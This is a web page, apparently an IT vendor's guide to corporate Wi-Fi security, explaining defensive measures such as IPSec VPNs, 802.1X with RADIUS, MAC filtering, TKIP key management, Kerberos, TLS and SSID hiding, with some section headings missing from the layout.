 |
| IT professionals can reduce risk to the company by using the tools available to them as provided by the access point manufacturer and taking the basic steps of turning on Wi-Fi security and changing defaults on the access point. By adding other security options and enabling add-ons, you can create a much-improved security regime and establish a richer security environment for your WLAN. The following descriptors represent various security enhancements you can bring into a WLAN, reducing the risk of unwanted access or obtaining data that's being transmitted. |
|
 |
|
|
|
| Most experts recommend the use of a VPN or similar technologies any time sensitive data must traverse unsecured links or media. These specially added protocol layers and encryption services enable traffic between a sender and a receiver to be further secured while in transit across public or other unsecured network links, such as the internet. |
|
| For example, IPSec provides mechanisms for establishing encrypted security associations between pairs of devices. IPSec is commonly used to tunnel encrypted data between a VPN client that requires remote access and a VPN gateway at the edge of a corporate network. You can also use IPSec to establish private end-to-end communications between pairs of computers inside a corporate network. In either case, IPSec uses Internet Key Exchange (IKE) to securely authenticate both parties, negotiate security properties and exchange shared keys across inherently unsecured links. |
|
| You can use VPNs based on IPSec to provide an additional layer of security above and beyond whatever Wi-Fi controls may be in place. Many early corporate wireless networks used VPNs to compensate for WEP weaknesses, providing individual user authentication and more robust encryption. Today, corporate wireless networks still use VPNs when encryption is required over the air and as sensitive data is relayed across an unsecure link, such as a branch office connection. VPNs are most frequently used in conjunction with wireless technologies to protect remote users connecting over Wi-Fi from public hotspots and home networks. |
|
|
|
|
|
| You can use 802.1X to effectively control access by wireless devices that support WPA/WPA2. Access by simple devices that don't support WPA/WPA2 is often controlled by MAC address filtering. This mechanism registers valid MAC addresses in use and permits only recognized MAC addresses to establish communication with wireless access points. These addresses are burned into network access devices during manufacturing and are designed to be unique. Although this mechanism sounds foolproof, it isn't. Software tools permit such addresses to be imitated, and anyone with the proper knowledge can monitor wireless communications over time to learn valid MAC addresses. |
|
| Tip: MAC address filtering is most effective when it's used in conjunction with the other approaches mentioned in this section. |
|
|
|
|
|
| Various wireless implementations use longer, stronger keys for WPA or other wireless protocols. For example, standard WEP keys are 40 bits long; however, many access points support WEP keys that are 128 or even 256 bits long. The longer the key, the harder it is to crack. However, even a long WEP key can be cracked if it is used long enough. |
|
| This is why TKIP encrypts data using temporal keys that are changed periodically. However, some mechanism is still required for the sender and receiver to end up with the same master key from which temporal keys are generated. When TKIP is used with WPA-Personal, the PSK is the basis for the master key. For this reason, it's essential that the PSK be a long, complex value that's hard for outsiders to guess. When you use TKIP with WPA-Enterprise, a fresh master key is supplied by the RADIUS server via 802.1X. |
|
|
|
|
|
| This is designed to provide reliable, secure third-party authentication services for all kinds of remote network access, including wireless access. Environments that use RADIUS can rely on strong authentication from a RADIUS server and secure mechanisms for key exchange between entering workstations and the access point. RADIUS, working in conjunction with 802.1X, provides the key exchange and management mechanisms that Wi-Fi itself lacks. A RADIUS server is generally required to support 802.1X and must be maintained by a knowledgeable person who fully understands the protocols and security parameters. |
|
| Note: You'll see how to set WPA security with a RADIUS server in the Do it section. |
|
|
|
|
|
| This is a standard set of internet protocols, services and identity proofs that are part and parcel of authentication in many networking environments. By providing mechanisms to publish asymmetric user keys or certificates and managing validity information for these keys, Kerberos provides strong authentication and strong encryption services that may be used in tandem with wireless networking. Kerberos is the default authentication method for Windows XP, Windows Vista and Windows Server 2003. |
|
|
| This is a session protocol that provides privacy for internet sessions between an application and a user. In wireless applications (where it's sometimes known as WTLS), it enables a user to access a server through an access point for authentication, and then helps decide on encryption mechanisms and keys to use before allowing network access or any exchange of real data. |
|
|
|
|
|
| Multiple keys are required when using WPA (TKIP) or WPA2 (AES). Data exchanged with each client can be encrypted by a unicast key unique for that user. However, broadcast keys known to everyone are required for access to local area network services such as Dynamic Host Configuration Protocol (DHCP) or Address Resolution Protocol (ARP). With WPA/WPA2, unicast and broadcast keys are supplied to each user at the time that they connect to the access point, before they can send any messages. 802.1X delivers a fresh unicast key for each session, but the broadcast key necessarily remains the same for some period of time. |
|
| However, if the same broadcast key were used long enough, eventually there would be messages encrypted in exactly the same way, letting an eavesdropper crack the broadcast key. To prevent this, some access point vendors enable mechanisms to manage short-lived, dynamically generated broadcast keys. Short timeouts on broadcast key life make it difficult to crack the keys; however, they only work for broadcast services (such as DHCP and ARP) and offer no improvements for unicast data security. |
|
|
|
|
|
| This is a technique developed by Lucent and available in most access points wherein access points don't broadcast their SSIDs in beacon frames and thereby don't advertise SSID information at all. This defeats simple scanning tools that can otherwise find wireless networks inside their broadcast ranges with ease. This helps prevent so-called war driving attacks where outsiders cruise neighborhoods looking for wireless networks to freely access. However, this technique offers weak control, because even slightly more sophisticated tools can overhear SSIDs carried in many other frames exchanged as authorized users connect to the access point. |
|
| Through combinations of these various approaches, it's possible to strengthen wireless security appreciably while mitigating potential vulnerabilities or exposures that Wi-Fi could otherwise present. |
|
|
|
Rate this information |
|
| To download the latest Adobe® Reader®, please go to the Adobe website at http://www.adobe.com. Adobe and Reader are trademarks of Adobe Systems Incorporated. |
|
|
|
Practical Wi-Fi security |
|
|
Related links |
|
|
Printable version
